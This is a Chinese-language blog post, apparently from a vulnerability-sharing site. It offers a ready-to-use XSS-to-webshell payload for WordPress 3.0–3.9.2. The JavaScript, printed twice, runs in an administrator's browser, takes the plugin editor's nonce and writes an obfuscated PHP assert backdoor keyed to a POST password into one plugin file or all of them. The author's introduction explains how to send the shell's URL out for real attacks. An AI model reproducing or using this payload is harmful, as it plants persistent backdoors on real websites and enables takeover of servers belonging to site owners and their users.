wordpress 3.0-3.9.2 XSS Getshell Payload

发表于 2014年12月01日
Vulndb

如果实战用记得把 console.lnfo 那一行该为发送喔。。。
密码：fuckxssQ
这个getshell js 有getshell当前模板跟getshell全部模板的功能
默认是getshell当前模板 StartGetshell = 0
如果要getshell全部插件模板把 StartGetshell的值改为1 即可

/* 
0x_Jin WordPress Getshell 
*/ 
var a = location.href.split('/'); 
var file = ""; 
var xurl = location.href.replace(a[a.length-1],"plugin-editor.php"); 
var file2 = []; 
var StartGetshell = 0; 
var shellcode = '<?php\n$k="ass"."ert"; $k(${"_PO"."ST"} ["fuckxssQ"]);'; 
jQuery.ajax({ 
  url: xurl, 
  type: 'GET', 
  dataType: 'html', 
  data: {}, 
}) 
.done(function(data) { 
  var temp = jQuery(data); 
  var Xtoken = ""; 
  var Tmpcode = ""; 
  temp.find('input#_wpnonce').each(function(i,o){ 
    var o=jQuery(o); 
    Xtoken=o.attr('value'); 
  }); 
  temp.find('textarea#newcontent').each(function(i,o){ 
    var o=jQuery(o); 
    Tmpcode = o.text().replace('<?php',shellcode);     
  }) 
  temp.find('div.alignleft big strong').each(function(i,o){ 
    var o=jQuery(o); 
    file = o.text(); 
  }) 
  temp.find('select#plugin option').each(function(i,o){ 
    var o=jQuery(o); 
    file2.push(o.attr('value')); 
  }) 
  if(Xtoken&&Tmpcode&&file){ 
    jQuery.ajax({ 
    url: xurl, 
    type: 'POST', 
    data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} 
    }) 
    .done(function(){ 
      var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); 
      console.info('Webshell：'+location.href.replace(temp,"wp-content/plugins/"+file)); 
      return; 
    })   
  } 
  if(StartGetshell){ 
    for(var i=0;i<file2.length;i++){ 
      var filename = file2[i]; 
      if(file2[i]!=file){ 
        jQuery.ajax({ 
          url: xurl, 
          type: 'POST', 
          data: {'plugin': file2[i],'Submit':'Select'}, 
        }) 
        .done(function(data) { 
          var NewCode = ""; 
          var NewToken= ""; 
          var Getshell=jQuery(data); 
          Getshell.find("textarea#newcontent").each(function(i,o){ 
            var o=jQuery(o); 
            NewCode = o.text().replace('<?php',shellcode);     
          }) 
          Getshell.find("input#_wpnonce").each(function(i,o){ 
            var o=jQuery(o); 
            NewToken = o.attr('value'); 
          }) 
          if(NewCode&&NewToken){ 
            console.log("1"+filename); 
            jQuery.ajax({ 
            url: xurl, 
            type: 'POST', 
            data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'} 
            }) 
            .done(function(){ 
              var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); 
              console.info('Webshell：'+location.href.replace(temp,"wp-content/plugins/"+filename)); 
              return; 
            })   
          } 
        })       
      } 
    } 
  } 
}) 
.fail(function() { 
  console.log("error"); 
}) 
.always(function() { 
  return; 
});

0x_Jin WordPress Getshell

var a = location.href.split('/');

var file = "";

var xurl = location.href.replace(a[a.length-1],"plugin-editor.php");

var file2 = [];

var StartGetshell = 0;

var shellcode = '<?php\n$k="ass"."ert"; $k(${"_PO"."ST"} ["fuckxssQ"]);';

jQuery.ajax({

url: xurl,

type: 'GET',

dataType: 'html',

data: {},

})

.done(function(data) {

var temp = jQuery(data);

var Xtoken = "";

var Tmpcode = "";

temp.find('input#_wpnonce').each(function(i,o){

var o=jQuery(o);

Xtoken=o.attr('value');

});

temp.find('textarea#newcontent').each(function(i,o){

var o=jQuery(o);

Tmpcode = o.text().replace('<?php',shellcode);

})

temp.find('div.alignleft big strong').each(function(i,o){

var o=jQuery(o);

file = o.text();

})

temp.find('select#plugin option').each(function(i,o){

var o=jQuery(o);

file2.push(o.attr('value'));

})

if(Xtoken&&Tmpcode&&file){

jQuery.ajax({

url: xurl,

type: 'POST',

data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}

})

.done(function(){

var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);

console.info('Webshell：'+location.href.replace(temp,"wp-content/plugins/"+file));

return;

})

}

if(StartGetshell){

for(var i=0;i<file2.length;i++){

var filename = file2[i];

if(file2[i]!=file){

jQuery.ajax({

url: xurl,

type: 'POST',

data: {'plugin': file2[i],'Submit':'Select'},

})

.done(function(data) {

var NewCode = "";

var NewToken= "";

var Getshell=jQuery(data);

Getshell.find("textarea#newcontent").each(function(i,o){

var o=jQuery(o);

NewCode = o.text().replace('<?php',shellcode);

})

Getshell.find("input#_wpnonce").each(function(i,o){

var o=jQuery(o);

NewToken = o.attr('value');

})

if(NewCode&&NewToken){

console.log("1"+filename);

jQuery.ajax({

url: xurl,

type: 'POST',

data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}

})

.done(function(){

var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);

console.info('Webshell：'+location.href.replace(temp,"wp-content/plugins/"+filename));

return;

})

}

})

}

})

.fail(function() {

console.log("error");

})

.always(function() {

return;

});

标签：wordpress漏洞原文连接：wordpress 3.0-3.9.2 XSS Getshell Payload 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

苹果商业模式【PHP版本】过狗Shell